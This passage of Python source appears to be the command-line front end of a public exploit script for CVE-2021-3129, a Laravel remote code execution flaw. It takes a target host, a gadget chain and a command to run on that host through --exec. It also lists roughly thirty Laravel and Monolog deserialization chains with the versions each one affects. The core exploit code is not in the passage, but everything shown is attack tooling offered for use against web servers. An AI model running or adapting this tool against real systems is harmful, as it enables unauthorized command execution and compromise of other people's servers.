    print(f"{PURPLE}{BOLD}| (__ \\ V /| _|___/ / () / /| |___|_ \\ |/ /_, /")
    print(f"{PURPLE}{BOLD} \\___| \\_/ |___| /___\\__/___|_| |___/_/___|/_/ ")
    print(f"{PURPLE}{BOLD} {UNDERLINE}https://github.com/joshuavanderpoll/CVE-2021-3129{END}")
    print(f"{END}{PURPLE} {format('phpggc.usage')}: {UNDERLINE}https://github.com/ambionics/phpggc{END}\n")

    # Arguments
    parser = argparse.ArgumentParser(description='Exploit CVE-2021-3129 - Laravel vulnerability exploit script')
    parser.add_argument('--host', help=format('parameter.host.prompt'), required=False)
    parser.add_argument('--force', help=format('parameter.force.prompt'), required=False, default=False, action='store_true')
    parser.add_argument('--log', help=format('parameter.log.path.prompt'), required=False, default=None)
    parser.add_argument('--ua', help=format('parameter.useragent.prompt'), required=False, default=False, action='store_true')
    parser.add_argument('--chain', help=format('parameter.chain.prompt'), required=False, default=None)
    parser.add_argument('--chains', help=format('parameter.chains.list'), required=False, default=False, action='store_true')
    parser.add_argument('--php', help=format('parameter.php.prompt'), required=False, default="php")
    parser.add_argument('--private-key', help=format('parameter.privatekey.prompt'), required=False, default="")
    parser.add_argument('--no-cache', help=format('parameter.no_store.prompt'), required=False, default=False, action='store_true')
    parser.add_argument('--exec', help=format('parameter.command.prompt'), required=False, default=False)
    parser.add_argument('--lang', help=format('parameter.command.language'), required=False, default=None)
    parser.add_argument('--cf', '--cloudflare', dest='cloudflare', action='store_true', help=format('parameter.cloudflare.prompt'))

    args = parser.parse_args()

    # Reload translations strings
    if args.lang is not None:
        if args.lang not in available_languages:
            error('language.invalid')
            sys.exit()

        with open(f"lang/{args.lang}.json", 'r') as f:
            translations = json.load(f)

    # Chains
    if args.chains:
        print(
            f"{BLUE}[•] {format('chains.available')}:\n"
            f"{DARKCYAN}- Laravel/RCE1 {CYAN}(5.4.27)\n"
            f"{DARKCYAN}- Laravel/RCE2 {CYAN}(5.4.0 <= 8.6.9+)\n"
            f"{DARKCYAN}- Laravel/RCE3 {CYAN}(5.5.0 <= 5.8.35)\n"
            f"{DARKCYAN}- Laravel/RCE4 {CYAN}(5.4.0 <= 8.6.9+)\n"
            f"{DARKCYAN}- Laravel/RCE5 {CYAN}(5.8.30)\n"
            f"{DARKCYAN}- Laravel/RCE6 {CYAN}(5.5.* <= 5.8.35)\n"
            f"{DARKCYAN}- Laravel/RCE7 {CYAN}(? <= 8.16.1)\n"
            f"{DARKCYAN}- Laravel/RCE8 {CYAN}(7.0.0 <= 8.6.9+)\n"
            f"{DARKCYAN}- Laravel/RCE9 {CYAN}(5.4.0 <= 9.1.8+)\n"
            f"{DARKCYAN}- Laravel/RCE10 {CYAN}(5.6.0 <= 9.1.8+)\n"
            f"{DARKCYAN}- Laravel/RCE11 {CYAN}(5.4.0 <= 9.1.8+)\n"
            f"{DARKCYAN}- Laravel/RCE12 {CYAN}(5.8.35, 7.0.0, 9.3.10)\n"
            f"{DARKCYAN}- Laravel/RCE13 {CYAN}(5.3.0 <= 9.5.1+)\n"
            f"{DARKCYAN}- Laravel/RCE14 {CYAN}(5.3.0 <= 9.5.1+)\n"
            f"{DARKCYAN}- Laravel/RCE15 {CYAN}(5.5.0 <= v9.5.1+)\n"
            f"{DARKCYAN}- Laravel/RCE16 {CYAN}(5.6.0 <= v9.5.1+)\n"
            f"{DARKCYAN}- Laravel/RCE17 {CYAN}(10.31.0)\n"
            f"{DARKCYAN}- Laravel/RCE18 {CYAN}(10.31.0)\n"
            f"{DARKCYAN}- Laravel/RCE19 {CYAN}(10.34)\n"
            f"{DARKCYAN}- Laravel/RCE20 {CYAN}(5.6 <= 10.x)\n"
            f"{DARKCYAN}- Laravel/RCE21 {CYAN}(5.1.*)\n"
            f"{DARKCYAN}- Laravel/RCE22 {CYAN}(v10.0.0 <= v11.34.2+)\n"
            f"\n"
            f"{DARKCYAN}- Monolog/RCE1 {CYAN}(1.4.1 <= 1.6.0 1.17.2 <= 2.2.0+)\n"
            f"{DARKCYAN}- Monolog/RCE2 {CYAN}(1.4.1 <= 2.2.0+)\n"
            f"{DARKCYAN}- Monolog/RCE3 {CYAN}(1.1.0 <= 1.10.0)\n"
            f"{DARKCYAN}- Monolog/RCE4 {CYAN}(? <= 2.4.4+)\n"
            f"{DARKCYAN}- Monolog/RCE5 {CYAN}(1.25 <= 2.2.0+)\n"
            f"{DARKCYAN}- Monolog/RCE6 {CYAN}(1.10.0 <= 2.2.0+)\n"
            f"{DARKCYAN}- Monolog/RCE7 {CYAN}(1.10.0 <= 2.7.0+)\n"
            f"{DARKCYAN}- Monolog/RCE8 {CYAN}(3.0.0 <= 3.1.0+)\n"
            f"{DARKCYAN}- Monolog/RCE9 {CYAN}(3.0.0 <= 3.1.0+)\n"
            f"{BLUE}{format('from')}: https://github.com/ambionics/phpggc#usage"
        )
        sys.exit()

    # Validate before scan start
    if args.host is None:
        args.host = _input(f"{format('parameter.host.enter')}{PURPLE} :")

    # endswith/startswith also cope with an empty answer (indexing raised IndexError).
    if not args.host.endswith("/"):
        args.host = args.host + "/"

    if not args.host.startswith(("http://", "https://")):
        args.host = f"http://{args.host}"

    if not validate_url(args.host):
        error('parameter.host.invalid')
        sys.exit()

    if args.chain is not None and args.chain.lower() not in CHAINS:
        error('parameter.chain.invalid', os.path.basename(sys.executable), os.path.basename(__file__))
        sys.exit()

    # Requests are sent with verify=False; silence the resulting warnings.
    requests.packages.urllib3.disable_warnings()

    x = Main(
        host=args.host,
        force=args.force,
        log_path=args.log,
        useragent=args.ua,
        chain=args.chain,
        php_executable=args.php,
        private_key=args.private_key,
        no_cache=args.no_cache,
        exec_command=args.exec,
        cloudflare=args.cloudflare
    )